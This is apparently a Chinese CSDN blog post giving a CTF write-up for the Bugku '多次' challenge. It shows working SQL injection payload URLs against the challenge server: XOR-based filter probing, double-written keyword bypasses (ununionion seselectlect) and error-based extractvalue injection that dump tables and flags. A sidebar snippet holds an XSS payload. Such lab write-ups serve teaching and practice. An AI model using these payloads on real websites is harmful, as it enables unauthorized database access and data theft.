bugku-多次

最新推荐文章于 2024-07-09 22:28:55 发布
最新推荐文章于 2024-07-09 22:28:55 发布
阅读量2.7w 收藏 3
点赞数
分类专栏: # ——【 SQL Inject】 ★ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/83450701
版权

 

这题分为两个关卡,都是sql注入的。第一关是关键字and、or、union、select过滤,第二关是报错注入。

测试

进入第一关没有什么提示信息,但是url地址栏 ?id=1 可能存在注入

id=1' 会报错,后面加--+注释返回正常,确定存在SQL注入

?id=1'or 1=1--+ 也报错,可能存在过滤

尝试双写绕过,?id=1'oorr 1=1--+ 返回正常

 

异或注入

这时我们可以用异或注入来检测,异或即两个条件相同(同真或同假)即为假

http://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+

满足异或条件就正常返显,There is nothing.

不满足异或条件时,返回 Error! Error! Error!

可以测试出被过滤的字符串有:and,or,union,select

 

双写绕过

这时我们可以用双写绕过。

猜字段数
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 报错

爆库
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+

爆表
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect
1,group_concat(table_name) from infoorrmation_schema.tables 
where table_schema="web1002-1"--+ (注意information_schema里也会过滤or)


爆列
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
1,group_concat(column_name) from infoorrmation_schema.columns 
where table_schema="web1002-1" and table_name="flag1"--+

爆数据
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
1,group_concat(flag1) from flag1--+

这是第一关的flag,不过是假的。因此我们只能爆出flag1中另一个address的数据

爆第二关地址
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
1,group_concat(address) from flag1--+

 

 

 

当双写绕过和大小写绕过都没用时,这时我们需要用到报错注入

 

报错注入

爆字段数
http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+ 正常
http://123.206.87.240:9004/Once_More.php?id=1' order by 3--+ 报错


爆库
http://123.206.87.240:9004/Once_More.php?id=1' and
(extractvalue(1,concat(0x7e,database(),0x7e)))--+


爆表
http://123.206.87.240:9004/Once_More.php?id=1' and 
(extractvalue(1,concat(0x7e,
(select group_concat(table_name) from information_schema.tables 
where table_schema="web1002-2"),0x7e)))--+


爆列
http://123.206.87.240:9004/Once_More.php?id=1' and 
(extractvalue(1,concat(0x7e,
(select group_concat(column_name) from information_schema.columns 
where table_schema="web1002-2" and table_name="flag2"),0x7e)))--+

爆flag
http://123.206.87.240:9004/Once_More.php?id=1' and 
(extractvalue(1,concat(0x7e,
(select group_concat(flag2) from flag2),0x7e)))--+

最后flag就出来了。

第三关地址。想知道有什么自己去看吧~

烟敛寒林o
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
bugku Web write up 二
0verWatch的博客
02-20 7295
XSS 先来最简单的弹窗 ?id=<srcipt>altert(/xss/)</script> 查看源码 发现<>被过滤掉了 这里学到一个技巧,就是用Unicode编码绕过 payload:?id=\u003cimg src=1 onerror=alert(_key_)\u003e 速度要快 这种题就是编程题 上脚本,注意这题是用m...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
BugKu-多次
苟有恒,必有三更眠,五更起。
08-06 655
多次 原题链接 http://120.24.86.145:9004 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 这里学习到一个新知识,如何判断过滤了哪些字符? 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么...
bugku渗透测试3-writeup
最新发布
vsdfbhsdhsdfh的博客
07-09 343
三、后面的话我们判断一下bugku靶场的内网地址,一般都是192.168.0.0和192.168.1.0这两个地址范围,使用burp中的轰炸来对内网进行一个探测。二十二、登录192.168.0.250网站,发现admin,admin弱口令登录没反应,抓包判断是存在xxe漏洞。二、发现网站有ssrf,尝试读取一下etc/passwd文件,成功在根目录读取到了flag。二十三、直接使用xxe漏洞读取根目录下flag和网站根目录下的flag。二十一、在网站根目录下读取flag文件。十六、成功获取到了flag。
bugku ctf 多次
qq_42777804的博客
08-03 419
打开网站后发现 分别将 id=1 2 3 4 5 有不同的提示,等于6时报错 学到大佬的一个方法, 如何判断过滤了哪些字符? 采用异或注入。 如果括号里面的判断是假的,那么页面就会显示正确 构造 ?id=1'^(length('union')!=0)^' 如果我修改里面的内容为length(‘union’)!=0 如果页面显示正确,...
BUGKU GET
飞花的世界
01-21 807
flagflag{bugku_get_su8kej2en}
bugku GET
PRCORANGE的博客
04-07 679
题目: $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 通过使用get方法提交what=flag即可
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击框架.zip
09-30
Bugku-AWD专版】是一款专为AWD(Attack With Defense)比赛设计的自动化攻击框架,它旨在帮助参赛者更高效地进行攻防对抗。这个框架的核心目标是简化比赛过程中对目标系统的攻击策略和自动化执行,使得参赛者能够...
Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
爬虫笔记-Bugku秋名山老司机(入门)
12-21
题目:bugku-秋名山老司机 题目要求:两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动 如: 多刷新几次可见题目提示,需要用post传入值,变量名为value 创建py文件,导入 requests 库和 re 库 并且创建...
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用...通过不断地学习和实践,我们可以不断提升自己的技能,与更多的人交流分享,共同进步。
BugKu_GET
Kobalos的博客
07-27 796
GET 访问页面,发现是一个简单赋值判断 &what=$_GET['what']; ----使用get方式传入一个what参数 echo $what; if($what=='flag') ----如果传入的what参数是flag echo 'flag{****}'; ----输出flag 尝试payload:/?what=flag ,发现成功显示flag ...
CTF Bugku GET
m0_50917178的博客
08-18 398
进入场景后看到一串PHP源代码 根据这源代码的提示,很容易想到使用GET方法来传递what参数以此来满足条件语句。所以在地址栏里面构造如下: 回车之后,what参数的值就传过去了,flag也就出来了 本题总结:难度不大,提示的已经很明确了。本题就是专门训练GET方法的。只要明白GET方法在url里面的呈现形式就可以很容易的做出这道题来。 ...
Bugku题目GET
zlloveyouforever的博客
06-18 374
bugku入门题GET 可能有很多人看到题目下面评论看来看去还是不会
Bugku——Get(web入门)
yc20030119的博客
08-04 423
bugeku——get
bugku——web基础$_GET
吃肉唐僧的博客
09-02 443
打开题目,发现如下代码 这段代码的意思就是用get方法what的参数请求,并且如果等于what的值等于flag就会输出flag 用hackbar请求,拿到flag
bugku web基础$_GET
qq_40390383的博客
06-23 1487
打开题目会发现 意思是提交get类型 what=flag 会输出flag
Bugku web3 $_GET
weixin_44522540的博客
02-22 184
二、web3 $_GET $what=$_GET['what'];//读取参数what,把值存到变量what里 echo $what; //输出 if($what=='flag')//如果值是flag echo 'flag{****}';//打印flag 这道题就是让我们通过url传入what的值,让其等于flag,构造url payload:?what=flag flag不是打印出来的一长串,真的flag是flag{1c…} ...
Bugku 多次
Superpig的博客
11-19 428
步骤 1、打开题目链接,发现url传入了参数id=1,当改参数为id=1’ 时显示有错误,改为id=1"时没有错误,因此,判断是错误注入 2、首先判断什么情况下会报错,方法:异或注入 id=1’^(0)%23 时,正常运行(%23是#的url编码) id=1’^(1)%23 时,报错 因此,判断出,当括号里的表达式为真时报错 3、判断过滤了哪些字符 id=1’(length(‘union’)...
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值